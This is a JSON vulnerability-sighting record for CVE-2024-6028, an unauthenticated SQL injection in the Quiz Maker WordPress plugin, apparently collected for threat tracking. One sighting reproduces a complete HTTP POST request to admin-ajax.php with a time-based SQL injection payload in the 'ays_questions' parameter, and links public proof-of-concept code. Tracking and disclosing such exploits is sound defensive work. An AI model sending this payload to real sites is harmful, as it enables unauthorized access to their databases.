{"vulnerability": "CVE-2024-6028", "sightings": [{"uuid": "26a36d79-3ff7-44b1-a55e-97e5511c9dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6028", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7755", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter\nURL\uff1ahttps://github.com/truonghuuphuc/CVE-2024-6028-Poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-25T14:25:34.000000Z"}, {"uuid": "d59fa86f-6267-46b7-9e15-4785caeeb7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6028", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1390", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8CVE-2024-6028 Quiz Maker <= 6.5.8.3 - Unauthenticated SQL Injection via 'ays_questions' Parameter\n\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: \nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 114\n\nays_quiz_id=1&ays_quiz_questions=1,2,3&quiz_id=1&ays_questions[ays-question-4)+or+sleep(if(1>0,5,0)]=&action=ays_finish_quiz\n\nhttps://x.com/DarkWebInformer/status/1805611355854016650\n\nhttps://github.com/truonghuuphuc/CVE-2024-6028-Poc", "creation_timestamp": "2024-06-25T16:40:04.000000Z"}]}